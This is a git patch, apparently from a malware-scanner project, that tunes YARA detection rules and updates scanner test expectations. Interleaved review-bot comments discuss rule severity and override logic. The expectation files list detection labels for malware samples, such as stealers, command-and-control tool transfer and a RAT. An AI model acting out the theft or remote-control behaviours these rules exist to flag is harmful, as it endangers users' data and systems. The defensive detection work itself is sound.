[https://www.gnu.org/software/coreutils/](https://www.gnu.org/software/coreutils/) | ## Added: ls [🔵 LOW] diff --git a/tests/macOS/clean/ls.sdiff.trigger_2 b/tests/macOS/clean/ls.sdiff.trigger_2 index 9e0e93a9c..be1dfc59f 100644 --- a/tests/macOS/clean/ls.sdiff.trigger_2 +++ b/tests/macOS/clean/ls.sdiff.trigger_2 @@ -3,6 +3,7 @@ -discover/system/hostname_get -exec/shell/TERM -fs/link_read +-hw/dev/ubi -net/url/embedded -process/name_set ++++ added: ls diff --git a/tests/macOS/clean/ls.sdiff.trigger_3 b/tests/macOS/clean/ls.sdiff.trigger_3 index 9e0e93a9c..be1dfc59f 100644 --- a/tests/macOS/clean/ls.sdiff.trigger_3 +++ b/tests/macOS/clean/ls.sdiff.trigger_3 @@ -3,6 +3,7 @@ -discover/system/hostname_get -exec/shell/TERM -fs/link_read +-hw/dev/ubi -net/url/embedded -process/name_set ++++ added: ls diff --git a/tests/npm/2024.testerrrrrrrrrr/init.js.simple b/tests/npm/2024.testerrrrrrrrrr/init.js.simple index 2f6a2655a..7544cae26 100644 --- a/tests/npm/2024.testerrrrrrrrrr/init.js.simple +++ b/tests/npm/2024.testerrrrrrrrrr/init.js.simple @@ -2,7 +2,7 @@ anti-static/obfuscation/hex: medium anti-static/obfuscation/js: critical anti-static/obfuscation/python: critical -c2/server_address: medium +c2/addr/server: medium discover/network/interface_list: medium exec/shell/exec: medium exfil/nodejs: critical diff --git a/tests/python/2022.PyPI.valyrian_debug/valyrian_debug_setup.py.simple b/tests/python/2022.PyPI.valyrian_debug/valyrian_debug_setup.py.simple index a382541db..110a2dbd1 100644 --- a/tests/python/2022.PyPI.valyrian_debug/valyrian_debug_setup.py.simple +++ b/tests/python/2022.PyPI.valyrian_debug/valyrian_debug_setup.py.simple 
@@ -2,10 +2,11 @@
 c2/tool_transfer/python: critical
 discover/ip/public: high
 discover/network/interface_list: medium
-discover/system/network: high
+discover/system/network: medium
 discover/system/platform: medium
 discover/user/name_get: high
-evasion/file/prefix: high
+evasion/file/prefix: medium
+evasion/file/prefix/tmp: high
 exec/cmd/pipe: medium
 exec/program: medium
 exec/shell/command: medium
diff --git a/tests/python/2024.Custom.RAT/output.py.simple b/tests/python/2024.Custom.RAT/output.py.simple
index fe9eedbe5..5ddebac73 100644
--- a/tests/python/2024.Custom.RAT/output.py.simple
+++ b/tests/python/2024.Custom.RAT/output.py.simple
@@ -15,7 +15,7 @@ data/encoding/json_decode: low
 discover/ip/geo: high
 discover/ip/public: high
 discover/network/interface_list: medium
-discover/process/name_get: medium
+discover/process/name: medium
 discover/system/network: high
 discover/system/platform: medium
 discover/system/sysinfo: medium
diff --git a/tests/python/clean/hatch/migrate.py.simple b/tests/python/clean/hatch/migrate.py.simple
index 06847576f..d3dd6534c 100644
--- a/tests/python/clean/hatch/migrate.py.simple
+++ b/tests/python/clean/hatch/migrate.py.simple
@@ -2,10 +2,10 @@
 discover/system/environment: medium
 exec/program: medium
 exec/remote_commands/code_eval: medium
+false-positives/py_hatch: low
 fs/directory/list: low
 fs/file/open: low
 fs/symlink_resolve: low
-impact/remote_access/py_setuptools: medium
 net/download: medium
 os/fd/read: low
 os/fd/write: low
diff --git a/tests/python/clean/numba/support.py.simple b/tests/python/clean/numba/support.py.simple
index ee2f6a10e..fd144277a 100644
--- a/tests/python/clean/numba/support.py.simple
+++ b/tests/python/clean/numba/support.py.simple
@@ -2,6 +2,7 @@
 discover/system/platform: medium
 exec/program: medium
 exec/remote_commands/code_eval: medium
+false-positives/setuptools: low
 fs/directory/create: low
 fs/directory/list: low
 fs/file/open: low
@@ -9,7 +10,6 @@ fs/file/read: low
 fs/file/write: low
 fs/tempdir: low
 fs/tempdir/create: low
-impact/remote_access/py_setuptools: low
 net/url/embedded: low
 os/fd/read: low
 os/fd/write: low
diff --git a/tests/python/clean/setuptools/namespaces.py.simple b/tests/python/clean/setuptools/namespaces.py.simple
index 4f93d1dee..43cd5497f 100644
--- a/tests/python/clean/setuptools/namespaces.py.simple
+++ b/tests/python/clean/setuptools/namespaces.py.simple
@@ -2,5 +2,5 @@
 data/encoding/json_encode: low
 exec/remote_commands/code_eval: medium
 exec/shell/command: medium
+false-positives/setuptools: low
 fs/directory/create: low
-impact/remote_access/py_setuptools: low
diff --git a/tests/windows/2024.aspdasdksa2/creal.exe.simple b/tests/windows/2024.aspdasdksa2/creal.exe.simple
index d6c10054b..13c24270f 100644
--- a/tests/windows/2024.aspdasdksa2/creal.exe.simple
+++ b/tests/windows/2024.aspdasdksa2/creal.exe.simple
@@ -9,6 +9,7 @@ data/compression/lzma: low
 data/embedded/app_manifest: medium
 data/encoding/base64: low
 discover/system/sysinfo: medium
+evasion/process_injection/ptrace: low
 exec/program: medium
 exec/tty/getpass: low
 exfil/stealer/python: critical
From ac9125e60457dd7d008cfdef9cb8620df27f2e2b Mon Sep 17 00:00:00 2001
From: Thomas Stromberg
Date: Sun, 10 Nov 2024 08:37:12 -0500
Subject: [PATCH 4/7] further rule tuning
---
pkg/action/testdata/scan_archive | 1 -
rules/c2/addr/url.yara | 2 +-
.../process/effective-groupid-get.yara | 27 ---
.../process/effective-userid-get.yara | 12 --
rules/discover/process/limit-get.yara | 13 --
rules/discover/process/pid-get.yara | 13 --
rules/discover/process/priority-get.yara | 11 -
rules/discover/process/userid-get.yara | 12 --
.../process/working_directory-get.yara | 24 ---
rules/evasion/process_injection/ptrace.yara | 2 +-
rules/hw/dev/ubi.yara | 2 +-
...4796BB27126E03A7E25DD5D589.cache.js.simple | 2 +-
...D016DDDA0665CB8CD8EEA6C537.cache.js.simple | 2 +-
tests/javascript/clean/mode-php.js.simple | 2 +-
.../clean/mode-php_laravel_blade.js.simple | 2 +-
tests/javascript/clean/php.js.simple | 2 +-
.../wyoming-xray-undress-robert.simple | 1 -
tests/linux/2024.kubo_injector/injector.json | 11 -
tests/linux/2024.sbcl.market/sbcl.sdiff | 1 -
tests/linux/clean/ld-2.27.so.simple | 1 -
tests/linux/clean/libgcj.so.17.0.0.simple | 1 -
tests/linux/clean/libgcj.so.17.simple | 1 -
tests/linux/clean/ls.x86_64.md | 1 -
tests/linux/clean/lslogins.md | 1 -
tests/linux/clean/pandoc.md | 3 +-
tests/linux/clean/qemu-system-xtensa.md | 191 +++++++++---------
tests/linux/clean/redis-server.aarch64.md | 97 +++++----
tests/linux/clean/tracer.o.aarch64.simple | 1 -
tests/linux/clean/trivy.simple | 1 -
tests/macOS/clean/ls.mdiff | 1 -
tests/macOS/clean/ls.sdiff.trigger_2 | 1 -
tests/macOS/clean/ls.sdiff.trigger_3 | 1 -
tests/php/2024.sagsooz/2024.php.simple | 2 +-
.../python/2021.DiscordSafety/setup.py.simple | 2 +-
tests/python/clean/numpy/misc_util.py.simple | 1 -
.../clean/versioneer/versioneer.py.simple | 1 -
.../windows/2024.aspdasdksa2/creal.exe.simple | 1 -
37 files changed, 154 insertions(+), 296 deletions(-)
delete mode 100644 rules/discover/process/effective-groupid-get.yara
delete mode 100644 rules/discover/process/effective-userid-get.yara
delete mode
100644 rules/discover/process/limit-get.yara
delete mode 100644 rules/discover/process/pid-get.yara
delete mode 100644 rules/discover/process/priority-get.yara
delete mode 100644 rules/discover/process/userid-get.yara
delete mode 100644 rules/discover/process/working_directory-get.yara
diff --git a/pkg/action/testdata/scan_archive b/pkg/action/testdata/scan_archive
index 10a7a0e46..25eb1da4c 100644
--- a/pkg/action/testdata/scan_archive
+++ b/pkg/action/testdata/scan_archive
@@ -34,7 +34,6 @@ discover/user/name_get: medium
 evasion/bypass_security/linux/se: medium
 evasion/file/prefix: medium
 evasion/hide_artifacts/pivot_root: medium
-evasion/process_injection/ptrace: low
 exec/plugin: low
 exec/program: medium
 exec/shell/background_sleep: medium
diff --git a/rules/c2/addr/url.yara b/rules/c2/addr/url.yara
index 9a05c77c9..430344def 100644
--- a/rules/c2/addr/url.yara
+++ b/rules/c2/addr/url.yara
@@ -64,7 +64,7 @@ rule binary_php_url_with_question: high {
 filesize < 150MB and elf_or_macho and $ref
 }
-rule script_php_url_with_question: medium {
+rule script_php_url_with_question: high {
 meta:
 description = "contains hardcoded endpoint with a question mark"
diff --git a/rules/discover/process/effective-groupid-get.yara b/rules/discover/process/effective-groupid-get.yara
deleted file mode 100644
index 65139d4ed..000000000
--- a/rules/discover/process/effective-groupid-get.yara
+++ /dev/null
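Review bot: The severity of `script_php_url_with_question` is raised from medium to high on the `rule` line without any tightening of its condition, and the only documentation is the unchanged `description = "contains hardcoded endpoint with a question mark"`, which does not say why a query string alone should score high. The sibling `binary_php_url_with_question` shown in the hunk's leading context already fires at HIGH on a clean binary in this series (the trufflehog.md expectations list ordinary SaaS endpoints such as api.mesibo.com as its evidence), so ordinary PHP scripts with parameterised API calls will presumably score high under this change as well. A meta field stating the rationale and the intended scope, for example `ref = "<link or note explaining why .php?param= endpoints are scored high>"`, would let later tuners judge the score; if a false-positive override exists for this pattern, naming it in the same meta block would help too. The rule's strings and condition lie outside the hunk.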
@@ -1,27 +0,0 @@ -rule getegid: harmless { - meta: - syscall = "getegid" - description = "returns the effective group id of the current process" - - strings: - $getuid = "getegid" fullword - $Getuid = "Getegid" fullword - - condition: - any of them -} - -rule php_getmygid: medium { - meta: - syscall = "getegid" - description = "returns the effective group id of the current process" - hash_2023_0xShell_0xShellori = "506e12e4ce1359ffab46038c4bf83d3ab443b7c5db0d5c8f3ad05340cb09c38e" - hash_2023_0xShell_root = "3baa3bfaa6ed78e853828f147c3747d818590faee5eecef67748209dd3d92afb" - hash_2023_0xShell_wesoori = "bab1040a9e569d7bf693ac907948a09323c5f7e7005012f7b75b5c1b2ced10ad" - - strings: - $getmygid = "getmygid" - - condition: - any of them -} diff --git a/rules/discover/process/effective-userid-get.yara b/rules/discover/process/effective-userid-get.yara deleted file mode 100644 index e3baa0a8c..000000000 --- a/rules/discover/process/effective-userid-get.yara +++ /dev/null @@ -1,12 +0,0 @@ -rule geteuid: harmless { - meta: - syscall = "geteuid" - description = "returns the effective user id of the current process" - - strings: - $getuid = "geteuid" fullword - $Getuid = "Geteuid" fullword - - condition: - any of them -} diff --git a/rules/discover/process/limit-get.yara b/rules/discover/process/limit-get.yara deleted file mode 100644 index 80f6c2193..000000000 --- a/rules/discover/process/limit-get.yara +++ /dev/null @@ -1,13 +0,0 @@ -rule getrlimit: harmless { - meta: - syscall = "getrlimit" - description = "retrieve resource limits" - pledge = "id" - - strings: - $ref = "getrlimit" fullword - $go = "Getrlimit" fullword - - condition: - any of them -} diff --git a/rules/discover/process/pid-get.yara b/rules/discover/process/pid-get.yara deleted file mode 100644 index 5c2b72256..000000000 --- a/rules/discover/process/pid-get.yara +++ /dev/null 
@@ -1,13 +0,0 @@ -rule getpid: harmless { - meta: - syscall = "getpid" - description = "gets the active process ID" - - strings: - $ref = "getpid" fullword - $Getpid = "Getpid" fullword - $procID = "processID" fullword - - condition: - any of them -} diff --git a/rules/discover/process/priority-get.yara b/rules/discover/process/priority-get.yara deleted file mode 100644 index 722ac201e..000000000 --- a/rules/discover/process/priority-get.yara +++ /dev/null @@ -1,11 +0,0 @@ -rule getpriority: harmless { - meta: - syscall = "getpriority" - pledge = "proc" - - strings: - $ref = "getpriority" fullword - - condition: - any of them -} diff --git a/rules/discover/process/userid-get.yara b/rules/discover/process/userid-get.yara deleted file mode 100644 index ca7fa609b..000000000 --- a/rules/discover/process/userid-get.yara +++ /dev/null @@ -1,12 +0,0 @@ -rule getuid: harmless { - meta: - syscall = "getuid" - description = "returns the user id of the current process" - - strings: - $getuid = "getuid" fullword - $Getuid = "Getuid" fullword - - condition: - any of them -} diff --git a/rules/discover/process/working_directory-get.yara b/rules/discover/process/working_directory-get.yara deleted file mode 100644 index 32276c274..000000000 --- a/rules/discover/process/working_directory-get.yara +++ /dev/null @@ -1,24 +0,0 @@ -rule getcwd: harmless { - meta: - pledge = "rpath" - syscall = "getcwd" - - strings: - $getcwd = "getcwd" fullword - - condition: - any of them -} - -rule getwd: harmless { - meta: - pledge = "rpath" - syscall = "getwd" - - strings: - $getwd = "getwd" fullword - $go_Getwd = "Getwd" fullword - - condition: - any of them -} diff --git a/rules/evasion/process_injection/ptrace.yara b/rules/evasion/process_injection/ptrace.yara index 50ad34eec..a43eab298 100644 --- a/rules/evasion/process_injection/ptrace.yara +++ b/rules/evasion/process_injection/ptrace.yara 
@@ -42,5 +42,5 @@ rule known_ptrace_injectors: override { $not_bpf = "BPF" fullword condition: - any of them + ptrace and any of them } diff --git a/rules/hw/dev/ubi.yara b/rules/hw/dev/ubi.yara index 6756140a9..11af74d4f 100644 --- a/rules/hw/dev/ubi.yara +++ b/rules/hw/dev/ubi.yara @@ -21,5 +21,5 @@ rule expected_ubi_users: override { $UBI = "UBI version" condition: - filesize < 512KB and any of them + filesize < 512KB and ubi and any of them } diff --git a/tests/javascript/clean/5A50D54796BB27126E03A7E25DD5D589.cache.js.simple b/tests/javascript/clean/5A50D54796BB27126E03A7E25DD5D589.cache.js.simple index 8837659fb..2804b9123 100644 --- a/tests/javascript/clean/5A50D54796BB27126E03A7E25DD5D589.cache.js.simple +++ b/tests/javascript/clean/5A50D54796BB27126E03A7E25DD5D589.cache.js.simple @@ -20,7 +20,7 @@ data/encoding/json_encode: low data/encoding/reverse: low data/random/insecure: low discover/group/lookup: medium -discover/process/effective_groupid_get: medium +discover/process/egid: medium discover/process/parent: low discover/processes/list: medium discover/system/hostname_get: low diff --git a/tests/javascript/clean/5D3EB8D016DDDA0665CB8CD8EEA6C537.cache.js.simple b/tests/javascript/clean/5D3EB8D016DDDA0665CB8CD8EEA6C537.cache.js.simple index b1504d031..698e87467 100644 --- a/tests/javascript/clean/5D3EB8D016DDDA0665CB8CD8EEA6C537.cache.js.simple +++ b/tests/javascript/clean/5D3EB8D016DDDA0665CB8CD8EEA6C537.cache.js.simple @@ -22,7 +22,7 @@ data/encoding/reverse: low data/hash/md5: low data/random/insecure: low discover/group/lookup: medium -discover/process/effective_groupid_get: medium +discover/process/egid: medium discover/process/parent: low discover/processes/list: medium discover/system/hostname_get: low diff --git a/tests/javascript/clean/mode-php.js.simple b/tests/javascript/clean/mode-php.js.simple index 17b967ce3..11134aafd 100644 --- a/tests/javascript/clean/mode-php.js.simple +++ b/tests/javascript/clean/mode-php.js.simple 
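Review bot: `ptrace and any of them` in known_ptrace_injectors, and `ubi and any of them` in expected_ubi_users in the next hunk, reference sibling rules by name, and YARA resolves such a reference only to a rule compiled earlier in the same source, so this compiles only if `ptrace` is declared before line 42 of ptrace.yara and `ubi` before line 21 of ubi.yara, which neither hunk shows. Before this change both overrides fired on their own whenever one of their allowlist strings appeared, which is why `evasion/process_injection/ptrace: low` and `hw/dev/ubi: low` drop out of several clean fixtures later in this patch; gating the override on the rule it suppresses is the right fix. A short comment above each condition, `// only fire when the rule being overridden also matches`, would record that intent for the other override rules in the tree. Both rule bodies start outside their hunks.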
@@ -11,7 +11,7 @@ data/encoding/base64: low data/encoding/reverse: low data/hash/md5: low data/random/insecure: low -discover/process/effective_groupid_get: medium +discover/process/egid: medium discover/process/parent: low discover/system/hostname_get: low discover/system/platform: low diff --git a/tests/javascript/clean/mode-php_laravel_blade.js.simple b/tests/javascript/clean/mode-php_laravel_blade.js.simple index 054657623..095b10183 100644 --- a/tests/javascript/clean/mode-php_laravel_blade.js.simple +++ b/tests/javascript/clean/mode-php_laravel_blade.js.simple @@ -11,7 +11,7 @@ data/encoding/base64: low data/encoding/reverse: low data/hash/md5: low data/random/insecure: low -discover/process/effective_groupid_get: medium +discover/process/egid: medium discover/process/parent: low discover/system/hostname_get: low discover/system/platform: low diff --git a/tests/javascript/clean/php.js.simple b/tests/javascript/clean/php.js.simple index 3b7669d02..0b5239bd7 100644 --- a/tests/javascript/clean/php.js.simple +++ b/tests/javascript/clean/php.js.simple @@ -9,7 +9,7 @@ data/compression/gzip: low data/encoding/base64: low data/encoding/reverse: low data/random/insecure: low -discover/process/effective_groupid_get: medium +discover/process/egid: medium discover/process/parent: low discover/system/hostname_get: low discover/system/platform: low diff --git a/tests/linux/2024.Beast/wyoming-xray-undress-robert.simple b/tests/linux/2024.Beast/wyoming-xray-undress-robert.simple index 457f20255..77a248d51 100644 --- a/tests/linux/2024.Beast/wyoming-xray-undress-robert.simple +++ b/tests/linux/2024.Beast/wyoming-xray-undress-robert.simple @@ -1,7 +1,6 @@ # linux/2024.Beast/wyoming-xray-undress-robert: critical fs/path/dev: medium fs/path/tmp: medium -hw/dev/ubi: low impact/ransom/linux: high impact/shutdown: medium lateral/vmware/vms: medium 
diff --git a/tests/linux/2024.kubo_injector/injector.json b/tests/linux/2024.kubo_injector/injector.json index 6df73c88c..baa2a4b88 100644 --- a/tests/linux/2024.kubo_injector/injector.json +++ b/tests/linux/2024.kubo_injector/injector.json @@ -112,17 +112,6 @@ "ID": "fs/symlink_resolve", "RuleName": "realpath" }, - { - "Description": "expected ubi users", - "MatchStrings": [ - "Usage:" - ], - "RiskScore": 1, - "RiskLevel": "LOW", - "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/hw/dev/ubi.yara#expected_ubi_users", - "ID": "hw/dev/ubi", - "RuleName": "expected_ubi_users" - }, { "Description": "Buffer overflow exploit", "MatchStrings": [ diff --git a/tests/linux/2024.sbcl.market/sbcl.sdiff b/tests/linux/2024.sbcl.market/sbcl.sdiff index 502e9857c..a24fab7f3 100644 --- a/tests/linux/2024.sbcl.market/sbcl.sdiff +++ b/tests/linux/2024.sbcl.market/sbcl.sdiff @@ -17,7 +17,6 @@ -fs/permission/modify -fs/proc/self_exe -fs/symlink_resolve --hw/dev/ubi -net/url/embedded ++++ added: sbcl.dirty +anti-static/elf/entropy diff --git a/tests/linux/clean/ld-2.27.so.simple b/tests/linux/clean/ld-2.27.so.simple index 2b9e1489a..b73884649 100644 --- a/tests/linux/clean/ld-2.27.so.simple +++ b/tests/linux/clean/ld-2.27.so.simple @@ -11,7 +11,6 @@ fs/path/var_profile: medium fs/proc/self_exe: medium fs/proc/sys_kernel_osrelease: medium fs/tempdir: low -hw/dev/ubi: low net/url/embedded: low persist/shell/bash: medium sus/exclamation: medium diff --git a/tests/linux/clean/libgcj.so.17.0.0.simple b/tests/linux/clean/libgcj.so.17.0.0.simple index 6fe699be2..3a05df73d 100644 --- a/tests/linux/clean/libgcj.so.17.0.0.simple +++ b/tests/linux/clean/libgcj.so.17.0.0.simple @@ -25,7 +25,6 @@ discover/system/platform: low discover/user/HOME: low discover/user/USER: low evasion/hijack_execution/LD_LIBRARY_PATH: low -evasion/process_injection/ptrace: low exec/cmd: medium exec/conditional/LANG: low exec/dylib/address_check: low 
diff --git a/tests/linux/clean/libgcj.so.17.simple b/tests/linux/clean/libgcj.so.17.simple index 1ee600a0a..592fdca9a 100644 --- a/tests/linux/clean/libgcj.so.17.simple +++ b/tests/linux/clean/libgcj.so.17.simple @@ -25,7 +25,6 @@ discover/system/platform: low discover/user/HOME: low discover/user/USER: low evasion/hijack_execution/LD_LIBRARY_PATH: low -evasion/process_injection/ptrace: low exec/cmd: medium exec/conditional/LANG: low exec/dylib/address_check: low diff --git a/tests/linux/clean/ls.x86_64.md b/tests/linux/clean/ls.x86_64.md index ffd6be373..fe3d4731f 100644 --- a/tests/linux/clean/ls.x86_64.md +++ b/tests/linux/clean/ls.x86_64.md @@ -7,6 +7,5 @@ | LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | | LOW | [exec/shell/TERM](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/TERM.yara#TERM) | [Look up or override terminal settings](https://www.gnu.org/software/gettext/manual/html_node/The-TERM-variable.html) | [TERM](https://github.com/search?q=TERM&type=code) | | LOW | [fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlink](https://github.com/search?q=readlink&type=code) | -| LOW | [hw/dev/ubi](https://github.com/chainguard-dev/malcontent/blob/main/rules/hw/dev/ubi.yara#expected_ubi_users) | expected ubi users | [Usage:](https://github.com/search?q=Usage%3A&type=code) | | LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://gnu.org/licenses/gpl.html](https://gnu.org/licenses/gpl.html)
[https://translationproject.org/team/](https://translationproject.org/team/)
[https://wiki.xiph.org/MIME_Types_and_File_Extensions](https://wiki.xiph.org/MIME_Types_and_File_Extensions)
[https://www.gnu.org/software/coreutils/](https://www.gnu.org/software/coreutils/) | diff --git a/tests/linux/clean/lslogins.md b/tests/linux/clean/lslogins.md index cf3dff5a7..ede252252 100644 --- a/tests/linux/clean/lslogins.md +++ b/tests/linux/clean/lslogins.md @@ -21,7 +21,6 @@ | LOW | [fs/path/var](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/var.yara#var_path) | path reference within /var | [/var/log/btmp](https://github.com/search?q=%2Fvar%2Flog%2Fbtmp&type=code)
[/var/log/lastlog](https://github.com/search?q=%2Fvar%2Flog%2Flastlog&type=code)
[/var/log/wtmp](https://github.com/search?q=%2Fvar%2Flog%2Fwtmp&type=code)
[/var/run/nologin](https://github.com/search?q=%2Fvar%2Frun%2Fnologin&type=code) | | LOW | [fs/tempdir](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/tempdir.yara#tempdir) | looks up location of temp directory | [TMPDIR](https://github.com/search?q=TMPDIR&type=code) | | LOW | [fs/tempdir/TMPDIR](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/TMPDIR.yara#TMPDIR) | TMPDIR | [TMPDIR](https://github.com/search?q=TMPDIR&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | -| LOW | [hw/dev/ubi](https://github.com/chainguard-dev/malcontent/blob/main/rules/hw/dev/ubi.yara#expected_ubi_users) | expected ubi users | [Usage:](https://github.com/search?q=Usage%3A&type=code) | | LOW | [os/fd/sendfile](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/sendfile.yara#sendfile) | [transfer data between file descriptors](https://man7.org/linux/man-pages/man2/sendfile.2.html) | [sendfile](https://github.com/search?q=sendfile&type=code) | | LOW | [process/groupid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groupid-set.yara#setregid) | set real and effective group ID of process | [setregid](https://github.com/search?q=setregid&type=code) | | LOW | [process/userid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/userid-set.yara#setuid) | [set real and effective user ID of current process](https://man7.org/linux/man-pages/man2/setuid.2.html) | [setuid](https://github.com/search?q=setuid&type=code) | diff --git a/tests/linux/clean/pandoc.md b/tests/linux/clean/pandoc.md index 609fc4915..cfcfe07e9 100644 --- a/tests/linux/clean/pandoc.md +++ b/tests/linux/clean/pandoc.md @@ -20,7 +20,7 @@ | MEDIUM | [data/hash/whirlpool](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/whirlpool.yara#whirlpool) | [hash function often used for cryptomining](https://en.wikipedia.org/wiki/Whirlpool_(hash_function)) | [WHIRLPOOL](https://github.com/search?q=WHIRLPOOL&type=code) | | MEDIUM | [discover/group/lookup](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/group/lookup.yara#getgrent) | get entry from group database | [endgrent](https://github.com/search?q=endgrent&type=code)
[getgrent](https://github.com/search?q=getgrent&type=code)
[setgrent](https://github.com/search?q=setgrent&type=code) | | MEDIUM | [discover/network/netstat](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/netstat.yara#netstat) | Uses 'netstat' for network information | [netstat](https://github.com/search?q=netstat&type=code) | -| MEDIUM | [discover/process/effective_groupid_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/effective-groupid-get.yara#php_getmygid) | returns the effective group id of the current process | [getmygid](https://github.com/search?q=getmygid&type=code) | +| MEDIUM | [discover/process/egid](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/egid.yara#php_getmygid) | returns the effective group id of the current process | [getmygid](https://github.com/search?q=getmygid&type=code) | | MEDIUM | [discover/process/name](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/name.yara#process_name) | get the current process name | [process_name](https://github.com/search?q=process_name&type=code) | | MEDIUM | [discover/user/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/username-get.yara#whoami) | [returns the user name running this process](https://man7.org/linux/man-pages/man1/whoami.1.html) | [whoami](https://github.com/search?q=whoami&type=code) | | MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) | @@ -97,7 +97,6 @@ | LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | | LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | | LOW | [evasion/logging/acct](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/logging/acct.yara#acct) | switch process accounting on or off | [acct](https://github.com/search?q=acct&type=code) | -| LOW | [evasion/process_injection/ptrace](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/process_injection/ptrace.yara#known_ptrace_injectors) | known ptrace injectors | [BPF](https://github.com/search?q=BPF&type=code) | | LOW | [exec/conditional/LANG](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/conditional/LANG.yara#LANG_getenv) | Looks up language of current user | [LANG](https://github.com/search?q=LANG&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | | LOW | [exec/dylib/iterate](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/iterate.yara#dl_iterate_phdr) | [iterate over list of shared objects](https://man7.org/linux/man-pages/man3/dl_iterate_phdr.3.html) | [dl_iterate_phdr](https://github.com/search?q=dl_iterate_phdr&type=code) | | LOW | [exec/plugin](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/plugin/plugin.yara#plugin) | references a 'plugin' | [Plugin_Abstract](https://github.com/search?q=Plugin_Abstract&type=code)
[QAccessiblePlugin](https://github.com/search?q=QAccessiblePlugin&type=code)
[QAudioSystemPlugin](https://github.com/search?q=QAudioSystemPlugin&type=code)
[QGenericPluginFactory](https://github.com/search?q=QGenericPluginFactory&type=code)
[QIconEnginePlugin](https://github.com/search?q=QIconEnginePlugin&type=code)
[QImageIOPlugin](https://github.com/search?q=QImageIOPlugin&type=code)
[QMediaServiceProviderPlugin](https://github.com/search?q=QMediaServiceProviderPlugin&type=code)
[QPictureFormatPlugin](https://github.com/search?q=QPictureFormatPlugin&type=code)
[QPluginLoader](https://github.com/search?q=QPluginLoader&type=code)
[QQmlEngineExtensionPlugin](https://github.com/search?q=QQmlEngineExtensionPlugin&type=code)
[QQmlExtensionPlugin](https://github.com/search?q=QQmlExtensionPlugin&type=code)
[QScriptExtensionPlugin](https://github.com/search?q=QScriptExtensionPlugin&type=code)
[QSqlDriverPlugin](https://github.com/search?q=QSqlDriverPlugin&type=code)
[QStaticPlugin](https://github.com/search?q=QStaticPlugin&type=code)
[QStylePlugin](https://github.com/search?q=QStylePlugin&type=code)
[QTextToSpeechPlugin](https://github.com/search?q=QTextToSpeechPlugin&type=code)
[QVirtualKeyboardExtensionPlugin](https://github.com/search?q=QVirtualKeyboardExtensionPlugin&type=code)
[addCorePlugin_closure](https://github.com/search?q=addCorePlugin_closure&type=code)
[addCorePlugin_info](https://github.com/search?q=addCorePlugin_info&type=code)
[enabledPlugin](https://github.com/search?q=enabledPlugin&type=code)
[js plugins](https://github.com/search?q=js+plugins&type=code)
[msession_plugin](https://github.com/search?q=msession_plugin&type=code)
[mysqlnd_uh_server_option_plugin_dir](https://github.com/search?q=mysqlnd_uh_server_option_plugin_dir&type=code)
[plugin_abstract](https://github.com/search?q=plugin_abstract&type=code)
[plugin_path](https://github.com/search?q=plugin_path&type=code)
[qAddCorePlugin_closure](https://github.com/search?q=qAddCorePlugin_closure&type=code)
[qAddCorePlugin_info](https://github.com/search?q=qAddCorePlugin_info&type=code) | diff --git a/tests/linux/clean/qemu-system-xtensa.md b/tests/linux/clean/qemu-system-xtensa.md index a3b559e84..d59d71b9d 100644 --- a/tests/linux/clean/qemu-system-xtensa.md +++ b/tests/linux/clean/qemu-system-xtensa.md 
@@ -1,99 +1,98 @@ ## linux/clean/qemu-system-xtensa [🛑 HIGH] -| RISK | KEY | DESCRIPTION | EVIDENCE | -|--------|---------------------------------------------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------|----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------